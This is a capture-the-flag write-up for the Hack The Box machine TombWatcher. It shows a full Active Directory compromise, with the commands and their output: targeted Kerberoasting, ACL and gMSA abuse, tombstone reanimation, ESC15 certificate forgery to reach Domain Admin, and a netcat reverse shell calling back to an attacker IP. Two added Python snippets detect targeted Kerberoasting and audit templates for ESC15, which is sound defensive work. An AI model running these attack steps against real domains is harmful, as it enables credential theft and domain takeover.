Hack The Box / WINDOWS / 2026-03-18
Hack The Box — TombWatcher (Windows)
Kerberoasting and AD ACL abuse to pivot across users, tombstone reanimation to recover cert_admin, then ESC15 certificate abuse to gain Domain Admin and root.
Target
- IP: 10.129.1.124
Machine information
As is common in real-life Windows penetration tests, you start the TombWatcher box with credentials for the following account:
henry / H3nry_987TGV!
Recon
sudo nmap -sC -sV 10.129.1.124 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-09 03:03:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after: 2025-11-16T00:47:59
| MD5: a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after: 2025-11-16T00:47:59
| MD5: a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after: 2025-11-16T00:47:59
| MD5: a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49707/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add tombwatcher.htb and dc01.tombwatcher.htb to /etc/hosts.
nxc smb dc01.tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'
SMB 10.129.1.124 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.124 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
nxc smb dc01.tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!' --shares
SMB 10.129.1.124 445 DC01 Share Permissions Remark
SMB 10.129.1.124 445 DC01 ----- ----------- ------
SMB 10.129.1.124 445 DC01 ADMIN$ Remote Admin
SMB 10.129.1.124 445 DC01 C$ Default share
SMB 10.129.1.124 445 DC01 IPC$ READ Remote IPC
SMB 10.129.1.124 445 DC01 NETLOGON READ Logon server share
SMB 10.129.1.124 445 DC01 SYSVOL READ Logon server share
There are no interesting shares.
nxc ldap dc01.tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'
SMB 10.129.1.124 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
LDAP 10.129.1.124 389 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
bloodhound-ce-python -u 'henry' -p 'H3nry_987TGV!' -ns 10.129.1.124 -d 'tombwatcher.htb' -dc dc01.tombwatcher.htb -c All --zip
We get a zip.
sudo bloodhound
Upload the zip.
From BloodHound, we see henry has WriteSPN over alfred.
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$dafaaff99b5778101aa102c1825923fb$...
[VERBOSE] SPN removed successfully for (Alfred)
Save the hash to a file (here named hash) and crack it with hashcat:
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
hashcat recovers the password:
basketball
nxc smb dc01.tombwatcher.htb -u 'alfred' -p 'basketball'
SMB 10.129.1.124 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.124 445 DC01 [+] tombwatcher.htb\alfred:basketball
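From the defender's side, the sequence above (SPN added to a user, RC4 ticket requested for it, SPN removed again) is what a SIEM rule for targeted Kerberoasting looks for. The following Python is added here and is not part of the original writeup or of targetedKerberoast; it correlates constructed Windows event records (5136 directory-change and 4769 TGS-request events, with field names simplified from the real event schema) to flag that sequence:

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the "$krb5tgs$23$" prefix in the hash cracked above

# Constructed sample events (not logs from the box): an SPN write on Alfred, an RC4
# TGS request for it, the SPN removal, then an unrelated AES (0x12) request.
EVENTS = [
    {"id": 5136, "time": "2025-06-09T03:10:01", "subject": "henry",
     "object": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "attribute": "servicePrincipalName", "op": "added"},
    {"id": 4769, "time": "2025-06-09T03:10:02", "subject": "henry",
     "service": "Alfred", "etype": 0x17},
    {"id": 5136, "time": "2025-06-09T03:10:03", "subject": "henry",
     "object": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "attribute": "servicePrincipalName", "op": "deleted"},
    {"id": 4769, "time": "2025-06-09T03:15:00", "subject": "svc_backup",
     "service": "DC01$", "etype": 0x12},
]

def _ts(event):
    return datetime.fromisoformat(event["time"])

def _cn(dn):
    """First RDN value of a DN: 'CN=Alfred,CN=Users,...' -> 'Alfred'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def detect_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Flag a servicePrincipalName write (5136) followed within `window` by an RC4
    TGS request (4769) for that account. Each hit records who wrote the SPN, who
    requested the ticket, and whether the SPN was removed again (the cleanup
    step targetedKerberoast performs)."""
    hits = []
    for add in events:
        if not (add["id"] == 5136 and add["attribute"] == "servicePrincipalName"
                and add["op"] == "added"):
            continue
        target, t0 = _cn(add["object"]), _ts(add)
        later = [e for e in events if timedelta(0) <= _ts(e) - t0 <= window]
        tgs = [e for e in later if e["id"] == 4769 and e["etype"] == RC4_HMAC
               and e["service"].lower() == target.lower()]
        if not tgs:
            continue
        removed = any(e["id"] == 5136 and e["op"] == "deleted"
                      and e["object"] == add["object"] for e in later)
        hits.append({"writer": add["subject"], "target": target,
                     "requester": tgs[0]["subject"], "spn_removed": removed})
    return hits
```

Auditing of servicePrincipalName changes requires a SACL on the user objects for 5136 events to be generated at all.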
From BloodHound we notice alfred has AddSelf on the group infrastructure.
Download bloodyAD:
- https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.tombwatcher.htb' -d tombwatcher.htb --dc-ip 10.129.1.124 -u 'alfred' -p 'basketball' add groupMember 'infrastructure' 'alfred'
[+] alfred added to infrastructure
From BloodHound we see the group infrastructure has ReadGMSAPassword over the machine account ansible_dev$.
Download gMSADumper:
- https://github.com/micahvandeusen/gMSADumper
python gMSADumper/gMSADumper.py -u 'alfred' -p 'basketball' -d tombwatcher.htb -l dc01.tombwatcher.htb
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
getTGT.py tombwatcher.htb/'ansible_dev$' -hashes ':1c37d00093dc2a5f25176bf2d474afdc' -dc-ip 10.129.1.124
[*] Saving ticket in ansible_dev$.ccache
export KRB5CCNAME='ansible_dev$.ccache'
nxc smb dc01.tombwatcher.htb -k --use-kcache
SMB dc01.tombwatcher.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB dc01.tombwatcher.htb 445 DC01 [+] tombwatcher.htb\ansible_dev$ from ccache
From BloodHound we see ansible_dev$ has ForceChangePassword over user sam.
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip 10.129.1.124 -k set password 'sam' '!Kali12345678!'
[+] Password changed successfully!
From BloodHound we see sam has WriteOwner over user john.
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip dc01.tombwatcher.htb -u 'sam' -p '!Kali12345678!' set owner 'john' 'sam'
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john
dacledit.py -action 'write' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'!Kali12345678!'
[*] DACL modified successfully!
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip dc01.tombwatcher.htb -u 'sam' -p '!Kali12345678!' set password 'john' '!Kali12345678!'
[+] Password changed successfully!
From BloodHound we see user john is in group Remote Management Users.
evil-winrm -i dc01.tombwatcher.htb -u 'john' -p '!Kali12345678!'
We can retrieve the user flag.
Tombstone reanimation and ADCS abuse
Upload PowerView.ps1 to the victim:
- https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1
. .\PowerView.ps1
Find-InterestingDomainAcl
ObjectDN : DC=tombwatcher,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 45ec5156-db7e-47bb-b53f-dbeb2d03c40f
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-1392491010-1358638721-2126982587-1106
IdentityReferenceName : john
IdentityReferenceDomain : tombwatcher.htb
IdentityReferenceDN : CN=john,CN=Users,DC=tombwatcher,DC=htb
IdentityReferenceClass : user
ObjectAceType 45ec5156-db7e-47bb-b53f-dbeb2d03c40f corresponds to Reanimate-Tombstones:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb
This IBM documentation page:
- https://www.ibm.com/docs/en/storage-protect/8.1.24?topic=rwiado-reanimate-tombstone-objects-restoring-from-system-state-backup
describes the concept as follows:
Tombstone reanimation is a process to restore an object that had been deleted from Active Directory. When an object is deleted from Active Directory, it is not physically erased, but only marked as deleted. It is then possible to reanimate (restore) the object.
Get-DomainObject -Tombstone -LDAPFilter '(isDeleted=TRUE)'
There are three deleted users named cert_admin, with SIDs:
- S-1-5-21-1392491010-1358638721-2126982587-1109
- S-1-5-21-1392491010-1358638721-2126982587-1110
- S-1-5-21-1392491010-1358638721-2126982587-1111
Which one should be restored?
Check available certificates:
certipy find -dc-ip 10.129.74.157 -u 'john' -p '!Kali12345678!' -target tombwatcher.htb -text -output certs
cat certs_Certipy.txt
We notice that in the WebServer template, the SID S-1-5-21-1392491010-1358638721-2126982587-1111 has enrollment rights.
So we restore this user.
Get-DomainObject -Tombstone -LDAPFilter '(isDeleted=TRUE)'
Take note of the distinguished name:
CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Now restore the user:
Restore-ADObject -Identity 'CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb'
Get-DomainUser
Now cert_admin appears as well, with distinguished name CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb.
So it belongs to OU ADCS.
From BloodHound we see john has GenericAll over OU ADCS.
This means it also has GenericAll over users in that OU, including cert_admin.
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip dc01.tombwatcher.htb -u 'john' -p '!Kali12345678!' set password 'cert_admin' '!Kali12345678!'
[+] Password changed successfully!
certipy find -dc-ip 10.129.74.157 -u 'cert_admin' -p '!Kali12345678!' -target dc01.tombwatcher.htb -text -stdout -vulnerable
Certificate Authorities
  0
    CA Name : tombwatcher-CA-1
    DNS Name : DC01.tombwatcher.htb
    Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start : 2024-11-16 00:47:48+00:00
    Certificate Validity End : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled : False
      HTTPS
        Enabled : False
    User Specified SAN : Disabled
    Request Disposition : Issue
    Enforce Encryption for Requests : Enabled
    Active Policy : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner : TOMBWATCHER.HTB\Administrators
      Access Rights
        ManageCa : TOMBWATCHER.HTB\Administrators
                   TOMBWATCHER.HTB\Domain Admins
                   TOMBWATCHER.HTB\Enterprise Admins
        ManageCertificates : TOMBWATCHER.HTB\Administrators
                             TOMBWATCHER.HTB\Domain Admins
                             TOMBWATCHER.HTB\Enterprise Admins
        Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name : WebServer
    Display Name : Web Server
    Certificate Authorities : tombwatcher-CA-1
    Enabled : True
    Client Authentication : False
    Enrollment Agent : False
    Any Purpose : False
    Enrollee Supplies Subject : True
    Certificate Name Flag : EnrolleeSuppliesSubject
    Extended Key Usage : Server Authentication
    Requires Manager Approval : False
    Requires Key Archival : False
    Authorized Signatures Required : 0
    Schema Version : 1
    Validity Period : 2 years
    Renewal Period : 6 weeks
    Minimum RSA Key Length : 2048
    Template Created : 2024-11-16T00:57:49+00:00
    Template Last Modified : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
                            TOMBWATCHER.HTB\Enterprise Admins
                            TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals : TOMBWATCHER.HTB\Domain Admins
                                  TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
                                 TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
                                TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
                                TOMBWATCHER.HTB\Enterprise Admins
                                TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15 : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
We can perform an ESC15 attack using template WebServer.
Useful article:
- https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760
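As an added audit check, not part of the original writeup or of Certipy itself, the following Python parses the text that certipy find -text writes (in its indented layout) and lists templates meeting the ESC15 precondition flagged above: enabled, schema version 1, enrollee-supplied subject, and enrollable by a principal outside an admin allowlist. The sample output and the allowlist are constructed assumptions; the check only matters on a CA that has not received the CVE-2024-49019 patch.

```python
import re

SAMPLE = r"""
  0
    Template Name                       : WebServer
    Enabled                             : True
    Enrollee Supplies Subject           : True
    Schema Version                      : 1
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
  1
    Template Name                       : Machine
    Enabled                             : True
    Enrollee Supplies Subject           : False
    Schema Version                      : 2
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Computers
"""
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}  # assumed allowlist
SECTIONS = {"Certificate Templates", "Permissions", "Enrollment Permissions",
            "Object Control Permissions"}

def parse_templates(text):
    """One dict per template; lines without a colon continue the previous entry."""
    templates, last_key = [], None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if re.fullmatch(r"\d+", line):            # template index starts a block
            templates.append({})
            last_key = None
        elif not templates or line in SECTIONS:   # section header, not a value
            last_key = None
        elif ":" in line:
            last_key, value = (p.strip() for p in line.split(":", 1))
            templates[-1][last_key] = [value]
        elif last_key:                            # continuation of a multi-valued field
            templates[-1][last_key].append(line)
    return templates

def esc15_candidates(text):
    """Enabled, schema 1, enrollee-supplied subject, enrollable by a non-admin."""
    hits = []
    for t in parse_templates(text):
        enrollers = {p.split("\\")[-1] for p in t.get("Enrollment Rights", [])}
        if (t.get("Enabled") == ["True"] and t.get("Schema Version") == ["1"]
                and t.get("Enrollee Supplies Subject") == ["True"]
                and enrollers - PRIVILEGED):
            hits.append(t["Template Name"][0])
    return hits
```

Feeding the full certs_Certipy.txt from earlier works the same way, since the CA block lacks the template fields and never matches.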
certipy req -ca tombwatcher-CA-1 -dc-ip 10.129.74.157 -u 'cert_admin@tombwatcher.htb' -p '!Kali12345678!' -template WebServer -application-policies 'Client Authentication' -upn 'Administrator@tombwatcher.htb'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
If we now run:
certipy auth -dc-ip 10.129.94.81 -pfx administrator.pfx
it does not work, as explained in the article: Kerberos PKINIT does not honour the Application Policies extension injected into the request, whereas Schannel, which LDAPS uses, does.
But we can get an LDAP shell with Certipy:
certipy auth -dc-ip 10.129.94.81 -pfx administrator.pfx -ldap-shell
Problem: on modern distros we get:
ldap3.core.exceptions.LDAPSocketOpenError: ("('socket ssl wrapping error: [SSL: CA_MD_TOO_WEAK] ca md too weak (_ssl.c:4086)',)",)
The DC's LDAPS certificate is signed with SHA-1 (sha1WithRSAEncryption, as the nmap output showed), a signature algorithm that current OpenSSL/libssl builds reject by default.
Note: Certipy is written in Python, and Python distributions ship their own OpenSSL/libssl binaries.
So we can create another conda environment with an older Python build that bundles an older OpenSSL/libssl:
conda create --name test python=3.7
conda activate test
pip install --upgrade certipy-ad
certipy auth -dc-ip 10.129.94.81 -pfx administrator.pfx -ldap-shell
We get an LDAP shell.
# add_user fake01
Attempting to create user in: %s CN=Users,DC=tombwatcher,DC=htb
Adding new user with username: fake01 and password: I_h:',SYy8Hct,n result: OK
# add_user_to_group fake01 "Domain Admins"
Adding user: fake01 to group Domain Admins result: OK
# exit
Bye!
Start netcat listener:
rlwrap nc -vlnp 4444
Upload nc64.exe and RunasCs.exe to the target:
- https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
- https://github.com/antonioCoco/RunasCs
.\RunasCs.exe 'fake01' "I_h:',SYy8Hct,n" 'C:\tmp\nc64.exe -e cmd.exe 10.10.14.252 4444'
We get a reverse shell as fake01.
whoami /all
We see fake01 belongs to BUILTIN\Administrators and TOMBWATCHER\Domain Admins.
cd C:\Users\Administrator\Desktop
We can retrieve the root flag:
type root.txt